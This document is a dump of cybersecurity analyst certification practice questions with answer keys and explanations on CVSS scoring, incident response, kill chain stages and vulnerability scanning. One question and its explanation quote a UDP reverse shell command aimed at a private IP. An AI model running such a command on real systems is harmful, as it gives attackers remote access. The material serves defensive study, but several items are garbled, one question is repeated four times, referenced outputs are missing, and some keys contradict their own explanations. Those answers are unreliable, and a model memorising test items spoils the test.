A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability.
Which of the following CVE metrics would be most accurate for this zero-day threat?
- A . CVSS: 31/AV: N/AC: L/PR: N/UI: N/S: U/C: H/1: K/A: L
- B . CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
- C . CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
- D . CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H
A
Explanation:
This answer matches the description of the zero-day threat. The attack vector is network (AV:N), the attack complexity is low (AC:L), no privileges are required (PR:N), no user interaction is required (UI:N), the scope is unchanged (S:U), the confidentiality and integrity impacts are high (C:H/I:H), and the availability impact is low (A:L). Official.
Reference: https://nvd.nist.gov/vuln-metrics/cvss
Which of the following tools would work best to prevent the exposure of PII outside of an organization?
- A . PAM
- B . IDS
- C . PKI
- D . DLP
D
Explanation:
Data loss prevention (DLP) is a tool that can prevent the exposure of PII outside of an organization by monitoring, detecting, and blocking sensitive data in motion, in use, or at rest.
An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:
Which of the following tuning recommendations should the security analyst share?
- A . Set an HttpOnlvflaq to force communication by HTTPS
- B . Block requests without an X-Frame-Options header
- C . Configure an Access-Control-Allow-Origin header to authorized domains
- D . Disable the cross-origin resource sharing header
B
Explanation:
The output shows that the web application is vulnerable to clickjacking attacks, which allow an attacker to overlay a hidden frame on top of a legitimate page and trick users into clicking on malicious links. Blocking requests without an X-Frame-Options header can prevent this attack by instructing the browser to not display the page within a frame.
Which of the following items should be included in a vulnerability scan report? (Choose two.)
- A . Lessons learned
- B . Service-level agreement
- C . Playbook
- D . Affected hosts
- E . Risk score
- F . Education plan
D, E
Explanation:
A vulnerability scan report should include information about the affected hosts, such as their IP addresses, hostnames, operating systems, and services. It should also include a risk score for each vulnerability, which indicates the severity and potential impact of the vulnerability on the host and the organization. Official
Reference: https://www.first.org/cvss/
The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released.
Which of the following would best protect this organization?
- A . A mean time to remediate of 30 days
- B . A mean time to detect of 45 days
- C . A mean time to respond of 15 days
- D . Third-party application testing
C
Explanation:
A mean time to remediate (MTTR) is a metric that measures how long it takes to fix a vulnerability after it is discovered. A MTTR of 30 days would best protect the organization from the new attacks that are exploited 45 days after a patch is released, as it would ensure that the vulnerabilities are fixed before they are exploited
A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious.
Given the following script:
Which of the following scripting languages was used in the script?
- A . PowerShel
- B . Ruby
- C . Python
- D . Shell script
A
Explanation:
The script uses PowerShell syntax, such as cmdlets, parameters, variables, and comments.
PowerShell is a scripting language that can be used to automate tasks and manage systems.
A company’s user accounts have been compromised. Users are also reporting that the company’s internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS.
Which of the following most likely describes the observed activity?
- A . There is an issue with the SSL certificate causinq port 443 to become unavailable for HTTPS access
- B . An on-path attack is being performed by someone with internal access that forces users into port 80
- C . The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80
- D . An error was caused by BGP due to new rules applied over the company’s internal routers
B
Explanation:
An on-path attack is a type of man-in-the-middle attack where an attacker intercepts and modifies network traffic between two parties. In this case, someone with internal access may be performing an on-path attack by forcing users into port 80, which is used for HTTP communication, instead of port 443, which is used for HTTPS communication. This would allow the attacker to compromise the user accounts and access the company’s internal portal.
A company’s user accounts have been compromised. Users are also reporting that the company’s internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS.
Which of the following most likely describes the observed activity?
- A . There is an issue with the SSL certificate causinq port 443 to become unavailable for HTTPS access
- B . An on-path attack is being performed by someone with internal access that forces users into port 80
- C . The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80
- D . An error was caused by BGP due to new rules applied over the company’s internal routers
B
Explanation:
An on-path attack is a type of man-in-the-middle attack where an attacker intercepts and modifies network traffic between two parties. In this case, someone with internal access may be performing an on-path attack by forcing users into port 80, which is used for HTTP communication, instead of port 443, which is used for HTTPS communication. This would allow the attacker to compromise the user accounts and access the company’s internal portal.
A company’s user accounts have been compromised. Users are also reporting that the company’s internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS.
Which of the following most likely describes the observed activity?
- A . There is an issue with the SSL certificate causinq port 443 to become unavailable for HTTPS access
- B . An on-path attack is being performed by someone with internal access that forces users into port 80
- C . The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80
- D . An error was caused by BGP due to new rules applied over the company’s internal routers
B
Explanation:
An on-path attack is a type of man-in-the-middle attack where an attacker intercepts and modifies network traffic between two parties. In this case, someone with internal access may be performing an on-path attack by forcing users into port 80, which is used for HTTP communication, instead of port 443, which is used for HTTPS communication. This would allow the attacker to compromise the user accounts and access the company’s internal portal.
A company’s user accounts have been compromised. Users are also reporting that the company’s internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS.
Which of the following most likely describes the observed activity?
- A . There is an issue with the SSL certificate causinq port 443 to become unavailable for HTTPS access
- B . An on-path attack is being performed by someone with internal access that forces users into port 80
- C . The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80
- D . An error was caused by BGP due to new rules applied over the company’s internal routers
B
Explanation:
An on-path attack is a type of man-in-the-middle attack where an attacker intercepts and modifies network traffic between two parties. In this case, someone with internal access may be performing an on-path attack by forcing users into port 80, which is used for HTTP communication, instead of port 443, which is used for HTTPS communication. This would allow the attacker to compromise the user accounts and access the company’s internal portal.
The Company shall prioritize patching of publicly available systems and services over patching of
internally available system.
According to the security policy, which of the following vulnerabilities should be the highest priority to patch?
A)
B)
C)
D)
- A . Option A
- B . Option B
- C . Option C
- D . Option D
C
Explanation:
According to the security policy, the company shall use the CVSSv3.1 Base Score Metrics to prioritize the remediation of security vulnerabilities. Option C has the highest CVSSv3.1 Base Score of 9.8, which indicates a critical severity level. The company shall also prioritize confidentiality of data over availability of systems and data, and option C has a high impact on confidentiality (C:H). Finally, the company shall prioritize patching of publicly available systems and services over patching of internally available systems, and option C affects a public-facing web server.
Reference: https://www.first.org/cvss/
Which of the following will most likely ensure that mission-critical services are available in the event of an incident?
- A . Business continuity plan
- B . Vulnerability management plan
- C . Disaster recovery plan
- D . Asset management plan
C
Explanation:
The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization.
Which of the following solutions will assist in reducing the risk?
- A . Deploy a CASB and enable policy enforcement
- B . Configure MFA with strict access
- C . Deploy an API gateway
- D . Enable SSO to the cloud applications
A
Explanation:
A cloud access security broker (CASB) is a tool that can help reduce the risk of shadow IT in the enterprise by providing visibility and control over cloud applications and services. A CASB can enable policy enforcement by blocking unauthorized or risky cloud applications, enforcing data loss prevention rules, encrypting sensitive data, and detecting anomalous user behavior.
An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack.
Which of the following logs should the team review first?
- A . CDN
- B . Vulnerability scanner
- C . DNS
- D . Web server
C
Explanation:
A distributed denial-of-service (DDoS) attack is a type of cyberattack that aims to overwhelm a target’s network or server with a large volume of traffic from multiple sources. A common technique for launching a DDoS attack is to compromise DNS servers, which are responsible for resolving domain names into IP addresses. By flooding DNS servers with malicious requests, attackers can disrupt the normal functioning of the internet and prevent users from accessing external SaaS
resources.
Reference: https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/cyber-kill-chain-seven-steps-cyberattack/
A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack.
Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?
- A . Weaponization
- B . Reconnaissance
- C . Delivery
- D . Exploitation
D
Explanation:
The Cyber Kill Chain is a framework that describes the stages of a cyberattack from reconnaissance to actions on objectives. The exploitation stage is where attackers take advantage of the vulnerabilities they have discovered in previous stages to further infiltrate a target’s network and achieve their objectives. In this case, the malicious actor has gained access to an internal network by means of social engineering and does not want to lose access in order to continue the attack. This indicates that the actor is in the exploitation stage of the Cyber Kill Chain.
Reference: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html
An analyst finds that an IP address outside of the company network that is being used to run network and vulnerability scans across external-facing assets.
Which of the following steps of an attack framework is the analyst witnessing?
- A . Exploitation
- B . Reconnaissance
- C . Command and control
- D . Actions on objectives
B
Explanation:
Reconnaissance is the first stage in the Cyber Kill Chain and involves researching potential targets before carrying out any penetration testing. The reconnaissance stage may include identifying potential targets, finding their vulnerabilities, discovering which third parties are connected to them (and what data they can access), and exploring existing entry points as well as finding new ones. Reconnaissance can take place both online and offline. In this case, an analyst finds that an IP address outside of the company network is being used to run network and vulnerability scans across external-facing assets. This indicates that the analyst is witnessing reconnaissance activity by an attacker.
Reference: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html
An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country.
Which of the following best describes what is happening? (Choose two.)
- A . Beaconinq
- B . Domain Name System hijacking
- C . Social engineering attack
- D . On-path attack
- E . Obfuscated links
- F . Address Resolution Protocol poisoning
C, E
Explanation:
A social engineering attack is a type of cyberattack that relies on manipulating human psychology rather than exploiting technical vulnerabilities. A social engineering attack may involve deceiving, persuading, or coercing users into performing actions that benefit the attacker, such as clicking on malicious links, divulging sensitive information, or granting access to restricted resources. An obfuscated link is a link that has been disguised or altered to hide its true destination or purpose. Obfuscated links are often used by attackers to trick users into visiting malicious websites or downloading malware. In this case, an incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. This indicates that the analyst is witnessing a social engineering attack using obfuscated links.
During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application.
Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?
- A . Conduct regular red team exercises over the application in production
- B . Ensure that all implemented coding libraries are regularly checked
- C . Use application security scanning as part of the pipeline for the CI/CDflow
- D . Implement proper input validation for any data entry form
C
Explanation:
Application security scanning is a process that involves testing and analyzing applications for security vulnerabilities, such as injection flaws, broken authentication, cross-site scripting, and insecure configuration. Application security scanning can help identify and fix security issues before they become exploitable by attackers. Using application security scanning as part of the pipeline for the continuous integration/continuous delivery (CI/CD) flow can help mitigate the problem of finding the same vulnerabilities in a critical application during security scanning. This is because application security scanning can be integrated into the development lifecycle and performed automatically and
frequently as part of the CI/CD process.
An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to.
Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?
- A . Proprietary systems
- B . Legacy systems
- C . Unsupported operating systems
- D . Lack of maintenance windows
A
Explanation:
Proprietary systems are systems that are owned and controlled by a specific vendor or manufacturer, and that use proprietary standards or protocols that are not compatible with other systems. Proprietary systems can pose a challenge for vulnerability management, as they may not allow users to access or modify their configuration, update their software, or patch their vulnerabilities. In this case, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. This indicates that these systems and associated vulnerabilities are examples of proprietary systems as inhibitors to remediation
The security team reviews a web server for XSS and runs the following Nmap scan:
Which of the following most accurately describes the result of the scan?
- A . An output of characters > and " as the parameters used m the attempt
- B . The vulnerable parameter ID hccp://l72.31.15.2/1.php?id-2 and unfiltered characters returned
- C . The vulnerable parameter and unfiltered or encoded characters passed > and " as unsafe
- D . The vulnerable parameter and characters > and " with a reflected XSS attempt
D
Explanation:
A cross-site scripting (XSS) attack is a type of web application attack that injects malicious code into a web page that is then executed by the browser of a victim user. A reflected XSS attack is a type of XSS attack where the malicious code is embedded in a URL or a form parameter that is sent to the web server and then reflected back to the user’s browser. In this case, the Nmap scan shows that the web server is vulnerable to a reflected XSS attack, as it returns the characters > and " without any filtering or encoding. The vulnerable parameter is id in the URL http://172.31.15.2/1.php?id=2.
Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?
- A . Develop a call tree to inform impacted users
- B . Schedule a review with all teams to discuss what occurred
- C . Create an executive summary to update company leadership
- D . Review regulatory compliance with public relations for official notification
B
Explanation:
One of the best actions to take after the conclusion of a security incident to improve incident response in the future is to schedule a review with all teams to discuss what occurred, what went well, what went wrong, and what can be improved. This review is also known as a lessons learned session or an after-action report. The purpose of this review is to identify the root causes of the incident, evaluate the effectiveness of the incident response process, document any gaps or weaknesses in the security controls, and recommend corrective actions or preventive measures for future incidents.
Reference: https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/cyber-kill-chain-seven-steps-cyberattack/
A security analyst received a malicious binary file to analyze.
Which of the following is the best technique to perform the analysis?
- A . Code analysis
- B . Static analysis
- C . Reverse engineering
- D . Fuzzing
C
Explanation:
Reverse engineering is a technique that involves analyzing a binary file to understand its structure,
functionality, and behavior. Reverse engineering can help security analysts perform malware analysis, vulnerability research, exploit development, and software debugging. Reverse engineering can be done using various tools, such as disassemblers, debuggers, decompilers, and hex editors.
An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation.
Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?
- A . Hard disk
- B . Primary boot partition
- C . Malicious tiles
- D . Routing table
- E . Static IP address
A
Explanation:
The hard disk is the piece of data that should be collected first in order to preserve sensitive information before isolating the server. The hard disk contains all the files and data stored on the server, which may include evidence of malicious activity, such as malware installation, data exfiltration, or configuration changes. The hard disk should be collected using proper forensic techniques, such as creating an image or a copy of the disk and maintaining its integrity using hashing algorithms.
Which of the following security operations tasks are ideal for automation?
- A . Suspicious file analysis:
– Look for suspicious-looking graphics in a folder.
– Create subfolders in the original folder based on category of graphics found.
– Move the suspicious graphics to the appropriate subfolder - B . Firewall IoC block actions:
Examine the firewall logs for IoCs from the most recently published zero-day exploit
Take mitigating actions in the firewall to block the behavior found in the logs
Follow up on any false positives that were caused by the block rules - C . Security application user errors:
Search the error logs for signs of users having trouble with the security application Look up the user’s phone number
Call the user to help with any questions about using the application - D . Email header analysis:
Check the email header for a phishing confidence metric greater than or equal to five
Add the domain of sender to the block list
Move the email to quarantine
D
Explanation:
Email header analysis is one of the security operations tasks that are ideal for automation. Email header analysis involves checking the email header for various indicators of phishing or spamming attempts, such as sender address spoofing, mismatched domains, suspicious subject lines, or phishing confidence metrics. Email header analysis can be automated using tools or scripts that can parse and analyze email headers and take appropriate actions based on predefined rules or thresholds
An organization has experienced a breach of customer transactions.
Under the terms of PCI DSS, which of the following groups should the organization report the breach to?
- A . PCI Security Standards Council
- B . Local law enforcement
- C . Federal law enforcement
- D . Card issuer
D
Explanation:
Under the terms of PCI DSS, an organization that has experienced a breach of customer transactions should report the breach to the card issuer. The card issuer is the financial institution that issues the payment cards to the customers and that is responsible for authorizing and processing the transactions. The card issuer may have specific reporting requirements and procedures for the organization to follow in the event of a breach. The organization should also notify other parties that may be affected by the breach, such as customers, law enforcement, or regulators, depending on the nature and scope of the breach.
Reference: https://www.pcisecuritystandards.org/
Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?
- A . Mean time to detect
- B . Number of exploits by tactic
- C . Alert volume
- D . Quantity of intrusion attempts
A
Explanation:
Mean time to detect (MTTD) is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system. MTTD is a metric that measures how long it takes to detect a security incident or threat from the time it occurs. MTTD can be improved by using tools and processes that can collect, correlate, analyze, and alert on security data from various sources. SIEM, SOAR, and ticketing systems are examples of such tools and processes that can help reduce MTTD and enhance security operations.
Reference: https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/cyber-kill-chain-seven-steps-cyberattack
A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment.
Which of the following implications should be considered on the new hybrid environment?
- A . The current scanners should be migrated to the cloud
- B . Cloud-specific misconfigurations may not be detected by the current scanners
- C . Existing vulnerability scanners cannot scan laaS systems
- D . Vulnerability scans on cloud environments should be performed from the cloud
B
Explanation:
Cloud-specific misconfigurations are security issues that arise from improper or inadequate configuration of cloud resources, such as storage buckets, databases, virtual machines, or containers. Cloud-specific misconfigurations may not be detected by the current scanners that are designed for on-premises environments, as they may not have the visibility or access to the cloud resources or the cloud provider’s APIs. Therefore, one of the implications that should be considered on the new hybrid environment is that cloud-specific misconfigurations may not be detected by the current scanners.
A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user’s workstation, to build the case for the investigation.
Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?
- A . Create a timeline of events detailinq the date stamps, user account hostname and IP information associated with the activities
- B . Ensure that the case details do not reflect any user-identifiable information Password protect the evidence and restrict access to personnel related to the investigation
- C . Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identity the case as an HR-related investigation
- D . Notify the SOC manager for awareness after confirmation that the activity was intentional
B
Explanation:
The best way to ensure that the investigation complies with HR or privacy policies is to ensure that the case details do not reflect any user-identifiable information, such as name, email address, phone number, or employee ID. This can help protect the privacy and confidentiality of the user and prevent any potential discrimination or retaliation. Additionally, password protecting the evidence and restricting access to personnel related to the investigation can help preserve the integrity and security of the evidence and prevent any unauthorized or accidental disclosure or modification.
Which of the following is the first step that should be performed when establishing a disaster recovery plan?
- A . Agree on the goals and objectives of the plan
- B . Determine the site to be used during a disaster
C Demonstrate adherence to a standard disaster recovery process - C . Identity applications to be run during a disaster
A
Explanation:
The first step that should be performed when establishing a disaster recovery plan is to agree on the goals and objectives of the plan. The goals and objectives of the plan should define what the plan aims to achieve, such as minimizing downtime, restoring critical functions, ensuring data integrity, or meeting compliance requirements. The goals and objectives of the plan should also be aligned with the business needs and priorities of the organization and be measurable and achievable.
A technician identifies a vulnerability on a server and applies a software patch.
Which of the following should be the next step in the remediation process?
- A . Testing
- B . Implementation
- C . Validation
- D . Rollback
C
Explanation:
The next step in the remediation process after applying a software patch is validation. Validation is a process that involves verifying that the patch has been successfully applied, that it has fixed the vulnerability, and that it has not caused any adverse effects on the system or application functionality or performance. Validation can be done using various methods, such as scanning, testing, monitoring, or auditing.
The analyst reviews the following endpoint log entry:
Which of the following has occurred?
- A . Registry change
- B . Rename computer
- C . New account introduced
- D . Privilege escalation
C
Explanation:
The endpoint log entry shows that a new account named “admin” has been created on a Windows system with a local group membership of “Administrators”. This indicates that a new account has been introduced on the system with administrative privileges. This could be a sign of malicious activity, such as privilege escalation or backdoor creation, by an attacker who has compromised the system.
A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools.
Which of the following best describes what the security program did?
- A . Data enrichment
- B . Security control plane
- C . Threat feed combination
- D . Single pane of glass
D
Explanation:
A single pane of glass is a term that describes a unified view or interface that integrates multiple tools or data sources into one dashboard or console. A single pane of glass can help improve security operations by providing visibility, correlation, analysis, and alerting capabilities across various security controls and systems. A single pane of glass can also help reduce complexity, improve efficiency, and enhance decision making for security analysts. In this case, a security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM, which provides a single pane of glass for security operations.
Reference: https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/cyber-kill-chain-seven-steps-cyberattack
Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment.
Given the following output:
Which of the following choices should the analyst look at first?
- A . wh4dc-748gy.lan (192.168.86.152)
- B . lan (192.168.86.22)
- C . imaging.lan (192.168.86.150)
- D . xlaptop.lan (192.168.86.249)
- E . p4wnp1_aloa.lan (192.168.86.56)
E
Explanation:
The analyst should look at p4wnp1_aloa.lan (192.168.86.56) first, as this is the most suspicious device on the network. P4wnP1 ALOA is a tool that can be used to create a malicious USB device that can perform various attacks, such as keystroke injection, network sniffing, man-in-the-middle, or backdoor creation. The presence of a device with this name on the network could indicate that an attacker has plugged in a malicious USB device to a system and gained access to the network.
Reference: https://github.com/mame82/P4wnP1_aloa
When starting an investigation, which of the following must be done first?
- A . Notify law enforcement
- B . Secure the scene
- C . Seize all related evidence
- D . Interview the witnesses
B
Explanation:
The first thing that must be done when starting an investigation is to secure the scene. Securing the scene involves isolating and protecting the area where the incident occurred, as well as any potential evidence or witnesses. Securing the scene can help prevent any tampering, contamination, or destruction of evidence, as well as any interference or obstruction of the investigation.
Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?
- A . The lead should review what is documented in the incident response policy or plan
- B . Management level members of the CSIRT should make that decision
- C . The lead has the authority to decide who to communicate with at any t me
- D . Subject matter experts on the team should communicate with others within the specified area of expertise
A
Explanation:
The incident response policy or plan is a document that defines the roles and responsibilities, procedures and processes, communication and escalation protocols, and reporting and documentation requirements for handling security incidents. The lead should review what is documented in the incident response policy or plan to determine who should be communicated with and when during a security incident, as well as what information should be shared and how. The incident response policy or plan should also be aligned with the organizational policies and legal obligations regarding incident notification and disclosure.
A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization.
Which of the following will produce the data needed for the briefing?
- A . Firewall logs
- B . Indicators of compromise
- C . Risk assessment
- D . Access control lists
B
Explanation:
Indicators of compromise (IoCs) are pieces of data or evidence that suggest a system or network has been compromised by an attacker or malware. IoCs can include IP addresses, domain names, URLs, file hashes, registry keys, network traffic patterns, user behaviors, or system anomalies. IoCs can be used to detect, analyze, and respond to security incidents, as well as to share threat intelligence with other organizations or authorities. IoCs can produce the data needed for an executive briefing on possible threats to the organization, as they can provide information on the source, nature, scope, impact, and mitigation of the threats.
An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country.
Which of the following describes what the analyst has noticed?
- A . Beaconing
- B . Cross-site scripting
- C . Buffer overflow
- D . PHP traversal
A
Explanation:
A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself.
Which of the following can the analyst perform to see the entire contents of the downloaded files?
- A . Change the display filter to f cp. accive. pore
- B . Change the display filter to tcg.port=20
- C . Change the display filter to f cp-daca and follow the TCP streams
- D . Navigate to the File menu and select FTP from the Export objects option
C
Explanation:
The best way to see the entire contents of the downloaded files in Wireshark is to change the display filter to ftp-data and follow the TCP streams. FTP-data is a protocol that is used to transfer files between an FTP client and server using TCP port 20. By filtering for ftp-data packets and following the TCP streams, the analyst can see the actual file data that was transferred during the FTP session
A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst.
Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?
- A . SLA
- B . MOU
- C . NDA
- D . Limitation of liability
A
Explanation:
SLA stands for service level agreement, which is a contract or document that defines the expectations and obligations between a service provider and a customer regarding the quality, availability, performance, or scope of a service. An SLA may also specify the metrics, penalties, or remedies for measuring or ensuring compliance with the agreed service levels. An SLA can help the SOC manager review if the team is meeting the appropriate contractual obligations for the customer, such as response time, resolution time, reporting frequency, or communication channels.
Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?
- A . Command and control
- B . Actions on objectives
- C . Exploitation
- D . Delivery
A
Explanation:
Command and control (C2) is a phase of the Cyber Kill Chain that involves the adversary attempting to establish communication with a successfully exploited target. C2 enables the adversary to remotely control or manipulate the target system or network using various methods, such as malware callbacks, backdoors, botnets, or covert channels. C2 allows the adversary to maintain persistence, exfiltrate data, execute commands, deliver payloads, or spread to other systems or networks.
A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic.
Which of the following would best meet this requirement?
- A . External
- B . Agent-based
- C . Non-credentialed
- D . Credentialed
B
Explanation:
Agent-based vulnerability scanning is a method that involves installing software agents on the target systems or networks that can perform local scans and report the results to a central server or console. Agent-based vulnerability scanning can reduce network traffic, as the scans are performed locally and only the results are transmitted over the network. Agent-based vulnerability scanning can also provide more accurate and up-to-date results, as the agents can scan continuously or on-demand, regardless of the system or network status or location.
A security analyst detects an exploit attempt containing the following command:
sh -i >& /dev/udp/10.1.1.1/4821 0>$l
Which of the following is being attempted?
- A . RCE
- B . Reverse shell
- C . XSS
- D . SQL injection
B
Explanation:
A reverse shell is a type of shell access that allows a remote user to execute commands on a target system or network by reversing the normal direction of communication. A reverse shell is usually created by running a malicious script or program on the target system that connects back to the remote user’s system and opens a shell session. A reverse shell can bypass firewalls or other security controls that block incoming connections, as it uses an outgoing connection initiated by the target system. In this case, the security analyst has detected an exploit attempt containing the following command:
sh -i >& /dev/udp/10.1.1.1/4821 0>$l
This command is a shell script that creates a reverse shell connection from the target system to the remote user’s system at IP address 10.1.1.1 and port 4821 using UDP protocol.
An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware.
Which of the following factors would an analyst most likely communicate as the reason for this escalation?
- A . Scope
- B . Weaponization
- C . CVSS
- D . Asset value
B
Explanation:
Weaponization is a factor that describes how an adversary develops or acquires an exploit or payload that can take advantage of a vulnerability and deliver a malicious effect. Weaponization can increase the severity or impact of a vulnerability, as it makes it easier or more likely for an attacker to exploit it successfully and cause damage or harm. Weaponization can also indicate the level of sophistication or motivation of an attacker, as well as the availability or popularity of an exploit or payload in the cyber threat landscape. In this case, an older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. This indicates that weaponization was the reason for this escalation.
An analyst is reviewing a vulnerability report for a server environment with the following entries:
Which of the following systems should be prioritized for patching first?
- A . 10.101.27.98
- B . 54.73.225.17
- C . 54.74.110.26
- D . 54.74.110.228
D
Explanation:
The system that should be prioritized for patching first is 54.74.110.228, as it has the highest number and severity of vulnerabilities among the four systems listed in the vulnerability report. According to the report, this system has 12 vulnerabilities, with 8 critical, 3 high, and 1 medium severity ratings. The critical vulnerabilities include CVE-2019-0708 (BlueKeep), CVE-2019-1182 (DejaBlue), CVE-2017-0144 (EternalBlue), and CVE-2017-0145 (EternalRomance), which are all remote code execution vulnerabilities that can allow an attacker to compromise the system without any user interaction or authentication. These vulnerabilities pose a high risk to the system and should be patched as soon as possible.
A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data.
Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?
- A . Credentialed network scanning
- B . Passive scanning
- C . Agent-based scanning
- D . Dynamic scanning
C
Explanation:
Agent-based scanning is a method that involves installing software agents on the target systems or networks that can perform local scans and report the results to a central server or console. Agent-based scanning can reduce the access to systems, as the agents do not require any credentials or permissions to scan the local system or network. Agent-based scanning can also provide the most accurate vulnerability scan results, as the agents can scan continuously or on-demand, regardless of the system or network status or location.
A security analyst is trying to identify anomalies on the network routing.
Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?
- A . function x() { info=$(geoiplookup $1) && echo "$1 | $info" }
- B . function x() { info=$(ping -c 1 $1 | awk -F "/" ’END{print $5}’) && echo "$1 | $info" }
- C . function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" ’{print $1} ‘).origin.asn.cymru.com TXT +short) && echo "$1 | $info" }
- D . function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo "$1 | $info" }
C
Explanation:
The function that can be used on a shell script to identify anomalies on the network routing most accurately is:
function x() { info=(dig(dig -x $1 | grep PTR | tail -n 1 | awk -F “.in-addr” ’{print $1} ‘).origin.asn.cymru.com TXT +short) && echo “$1 | $info” }
This function takes an IP address as an argument and performs two DNS lookups using the dig command. The first lookup uses the -x option to perform a reverse DNS lookup and get the hostname associated with the IP address. The second lookup uses the origin.asn.cymru.com domain to get the
autonomous system number (ASN) and other information related to the IP address. The function then prints the IP address and the ASN information, which can help identify any routing anomalies or inconsistencies
There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat.
Which of the following security controls would best support the company in this scenario?
- A . Implement step-up authentication for administrators
- B . Improve employee training and awareness
- C . Increase password complexity standards
- D . Deploy mobile device management
B
Explanation:
The best security control to implement against sensitive information being disclosed via file sharing services is to improve employee training and awareness. Employee training and awareness can help educate employees on the risks and consequences of using file sharing services for sensitive information, as well as the policies and procedures for handling such information securely and appropriately. Employee training and awareness can also help foster a security culture and encourage employees to report any incidents or violations of information security.
Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach?
- A . Determine the sophistication of the audience that the report is meant for
- B . Include references and sources of information on the first page
- C . Include a table of contents outlining the entire report
- D . Decide on the color scheme that will effectively communicate the metrics
A
Explanation:
The best way to begin preparation for a report titled “What We Learned” regarding a recent incident involving a cybersecurity breach is to determine the sophistication of the audience that the report is meant for. The sophistication of the audience refers to their level of technical knowledge, understanding, or interest in cybersecurity topics. Determining the sophistication of the audience can help tailor the report content, language, tone, and format to suit their needs and expectations. For example, a report for executive management may be more concise, high-level, and business-oriented than a report for technical staff or peers.
A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers.
Which of the following actions would allow the analyst to achieve the objective?
- A . Upload the binary to an air gapped sandbox for analysis
- B . Send the binaries to the antivirus vendor
- C . Execute the binaries on an environment with internet connectivity
- D . Query the file hashes using VirusTotal
A
Explanation:
The best action that would allow the analyst to gather intelligence without disclosing information to the attackers is to upload the binary to an air gapped sandbox for analysis. An air gapped sandbox is an isolated environment that has no connection to any external network or system. Uploading the binary to an air gapped sandbox can prevent any communication or interaction between the binary and the attackers, as well as any potential harm or infection to other systems or networks. An air gapped sandbox can also allow the analyst to safely analyze and observe the behavior, functionality, or characteristics of the binary.
